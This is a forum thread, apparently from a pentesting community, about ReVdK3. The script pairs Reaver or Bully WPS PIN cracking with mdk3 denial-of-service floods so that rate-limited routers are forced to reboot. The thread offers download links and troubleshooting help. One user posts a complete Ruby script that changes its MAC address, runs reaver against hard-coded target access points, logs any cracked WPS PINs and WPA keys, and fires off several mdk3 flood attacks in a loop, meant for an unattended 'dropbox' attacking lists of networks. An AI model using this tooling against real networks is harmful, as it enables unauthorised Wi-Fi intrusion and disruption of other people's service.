Reaver "AP rate limiting detected" and automatic mdk3 solution


LexMichdeappel

Well, instead of using the gnome terminal, could the terminal invocations be replaced with an openwrt compatible one? Such as screen or tmux, byobu? As I'm still learning, this is beyond my current knowledge to make a working port for openwrt of your nice script! :-) ... 0E 800 had attempted this and modified your script and named it "ReVdK3-rW.sh", that version is here: https://drive.google.com/file/d/0BzolLN2vKwxjcGNrYmp1cVBFT28/edit ... but there is a want / need for this script to be able to run on other systems that only supply screen, tmux, byobu etc. interfaces.

I see your point... I downloaded the modified script done by OE 800 :) ... a few patches for it to work with MarkV is not bad, lol... what terminal emulators except tmux are supported in MarkV? :) I will see what I can do...


That's great news! Also I really like the updated script of yours, been running it in my Kali box :-) but off the top of my head, all I can think of for terms supported other than tmux are "screen" and byobu.

I think "screen" would probably be best suited for this task, but I'm still novice in this area.

Again, great work on your script!

Edit: my noobness is shining through. Byobu is a layer on top of tmux or screen. So I guess, as far as my knowledge goes, tmux and screen are the only viable ones I know of.

Edited by datahead

Firstly, this script is great and works wonderfully on my Kali box, so thank you repzeroworld!

I'm trying to get this running on a Raspberry pi now. With any of the MDK3 options I chose I get "No source mac specified" and "Couldn't determine current channel for mon0" when it begins running that part of the script. I specify a channel during the Bully setup, as well as -B.

Bully seems to run fine, but obviously without the benefits of the MDK3 attacks. Is there something I'm missing here because I'm on a Pi? It seems to be waiting for a beacon on channel -1, which is not the channel I set.

I haven't tried this script on my Mark V as that's in use on a longer term project at the moment.

Thanks dudes!

Edited by velkrosmaak
Thanks datahead and velkrosmaak.

When running your adapter in monitor mode, check to see if there are any programs such as network managers that automatically bring your wireless adapter interface up. New wifi drivers do not allow you to use your adapter in monitor mode while your wireless interface is up... I think there are patches for drivers around... however, the script executes a piece of code several times to bring your wireless interface down in order to use your monitor interface. Also, you can probably try not to put a channel number so that your adapter can adjust itself to hopping channels to find the right channel the target is on. :D


  • 4 weeks later...

****************ReVdK3-r2 (Revision 2)********************************

Download Link

http://www72.zippyshare.com/v/82770958/file.html

I have revised the script for those who prefer to use bully wps pin cracker. Now you have two options for pin cracking either reaver 1.4 or bully

Dependency checks:

The program checks to see if the following are installed so that the script can function well:

[1] reaver

[2] bully (if you are using)

[3] mdk3

[4] aireplay-ng

[5] gnome-terminal

[6] timeout

Possibly the last revision of the script since new access points are getting invulnerable to the attacks... however I will experiment with new attacks and see if they are effective for rebooting APs... best of luck, ReVdK3 users!

Credit to my friend WaLkZ and others who prefer bully wps pin cracker

Thank you.. registered just to give you thanks for the great script :).


  • 2 weeks later...


repzeroworld, I have a few questions about the script. I can't get reaver to associate with the AP, it just sits at "waiting for beacon". I've seen other people with this problem, but can't seem to find any solutions. It may be that mon0 doesn't work with my reaver (I usually have -i wlan0) or it might be something with the script, as I can run the mdk3 attacks and reaver quite happily by themselves. Any help would be amazing, thanks.


To solve the "AP rate limiting....." problem, I carried out the following procedure:

I left two terminals open, one with Reaver and the other with mdk3, running the two simultaneously, and it worked. Try doing that.

Look at the screenshot.

Post the two command lines, please.

Give some details on:

1. The reaver command line you are using

2. The chipset of your wifi card (try "airmon-ng")

3. Have you been bringing wlan0 down when using the card in monitor interface?

4. Check to see what channel the victim is on (try running an airodump-ng scan or using wash)... it could be that you are on the wrong channel expecting to get beacons

Edited by repzeroworld

There are all kinds of scripts all over pastebin.

Today I have just assembled a reaver Dropbox.

Anker 15000mah

awus036h

Awus036nha

Usb powered hub

And raspberry pi b+ kali installed.

I have written 2 scripts. One will simply log how long the battery will last.

And then I have made a script that performs some Reaver attacks on a large list of MAC addresses.

reaver wlan0 mac-from-list

reaver wlan1 mac-from-list

2 access points will be attacked for 5 minutes at a time. Then it will move on to the next 2 MAC addresses in the list with a newly generated MAC address.

I like to call this a shotgun blast... I'll have to share the script another time. I could set you up with a barebones example script... ruby for the win!


require 'open3'
#on reboot stuff.

device="wlan2"
channel="8"
ap_mac="4C:60:DE:31:C3:79"
essid="NETGEAR34"
`ifconfig #{device} down`
`iwconfig #{device} mode monitor`
`ifconfig #{device} up`

#will not launch until the while true loop at the bottom
#reaver attack and log
def reaver(device, channel, ap_mac)
	Thread.start{
	puts "Random mac..."
	Open3.popen3("ifconfig #{device} down")
	Open3.popen3("macchanger #{device} -r")
	Open3.popen3("ifconfig #{device} up")
		Open3.popen3("reaver -i #{device} -vv --dh-small -b #{ap_mac} -c #{channel}"){|i,o,t|
			i.puts("y")  #tell reaver Yes to continue where the attack left off
			while line=o.gets
				#Log all reaver output to a file
				puts line
				log_all=File.open("log_all_#{ap_mac}",'a')
				log_all.puts(line)
				log_all.close

				#100.00% complete
				#Pin cracked in
				#WPS PIN: '12345678'
				#WPA PSK: 'asshole'
				#AP SSID: 'noob'
				# Log success to another file
				if line.include?("100.00%") || line.include?("Pin cracked") || line.include?("WPS PIN:") || line.include?("WPA PSK:") || line.include?("AP SSID:")
					success=File.open("sucess_#{ap_mac}",'a')
					success.puts(line)
					success.close
				end
			end
		}
	} #thread.start
end


 


#will not launch until the while true loop at the bottom
def mdk3(device, channel, ap_mac, essid)
	Thread.start{Open3.popen3("mdk3 #{device} b -n #{essid} -g -w -m -c #{channel}"){|i,o,t| while line=o.gets; puts line; end } }
	Thread.start{Open3.popen3("mdk3 #{device} a -i #{ap_mac} -m -s 1024"){|i,o,t| while line=o.gets; puts line; end } }
	Thread.start{Open3.popen3("mdk3 #{device} m -t #{ap_mac} -j -w 1 -n 1024 -s 1024"){|i,o,t| while line=o.gets; puts line; end } }
	Thread.start{Open3.popen3("mdk3 #{device} b -n #{essid} -g -w -m -c #{channel}"){|i,o,t| while line=o.gets; puts line; end } }
	Thread.start{Open3.popen3("mdk3 #{device} w -e #{essid} -c #{channel}"){|i,o,t| while line=o.gets; puts line; end } }
end

#the main reason for this script:
# if you let reaver run for too long, it may hang without any data output (frozen state)... so killall and restart
#just added a few extra dos attacks

#reaver -i #{device} -vv --dh-small -b 20:76:00:1C:D9:C8 -c 6
#reaver -i wlan2 -vv --dh-small -b 4C:60:DE:31:C3:79 -c 8
while true

	#reaver(device, channel, ap_mac)
	reaver("wlan2", "6", "20:76:00:1C:D9:C8")
	reaver("wlan0", "8", "4C:60:DE:31:C3:79")

	#run for 10 minutes, then restart
	sleep 10*60
	`killall reaver`

	#mdk3(device, channel, ap_mac, essid)
	mdk3("wlan2", "6", "20:76:00:1C:D9:C8", "myqwest4681")
	mdk3("wlan0", "8", "4C:60:DE:31:C3:79", "NETGEAR34")
	sleep 2*60
	`killall mdk3`

end

So, it's something I made real quick... I tried to keep it simple...

You have to modify the while true loop to work for you...

If you set the options at the top, then you simply need to use this:

reaver(device, channel, ap_mac)

exactly as shown inside the while true loop.

Then it will run reaver for 10*60 seconds (ten minutes).

Then it will kill reaver and launch some mdk3 attacks for 2 minutes.

A new MAC is generated before each reaver thread starts.

I could add an if "rate detected" then trigger the mdk3 attack. g2g


I have changed all url downloaded links

below is the new link

http://www56.zippyshare.com/v/UZrMxTtZ/file.html

Hi, can you pls tell me how exactly to run your script? I am new to this, and I want to try my parents' router (with their permission ofc).

I have kali linux debian 7 and I tried what you said to 100j, but after I write that line and drag the file, I press enter and nothing happens.

Also, I have wifislax, could this script work on it too?


Hello repzeroworld,

I have tried both revdk3 revisions and I'd like to say that you have done a great job. I have a problem: when I run the script and the AP gets locked, mdk3 attacks start but the router doesn't reboot (ZTE). It runs even with 40000 clients connected! I don't think that is possible so I thought that might be a problem. I have managed to reboot it once by manually running the mdk3 attacks. I think that when we continuously run an attack, the AP freezes and does not reboot. Can you help me to solve this?


  • 4 weeks later...

Which commands did you use, friend?!?!? Help us out ;)
